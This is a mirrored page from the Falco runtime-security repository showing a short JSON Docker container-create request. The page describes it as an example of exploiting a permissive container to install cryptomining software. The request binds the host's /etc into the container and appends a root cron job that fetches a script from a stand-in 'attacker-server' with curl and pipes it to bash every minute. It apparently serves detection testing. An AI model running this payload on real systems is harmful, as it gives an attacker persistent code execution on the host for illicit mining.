mirror of
https://github.com/falcosecurity/falco.git
synced 2025-10-21 19:44:57 +00:00
a3f53138d3
An example showing how an overly permissive container environment can be exploited to install and run cryptomining software on a host system.
8 lines
272 B
JSON
8 lines
272 B
JSON
{
|
|
"Cmd": ["/bin/sh", "-c", "echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && touch /mnt/etc/crontabs/cron.update && sleep 300"],
|
|
"Image": "alpine:latest",
|
|
"HostConfig": {
|
|
"Binds": ["/etc:/mnt/etc"]
|
|
}
|
|
}
|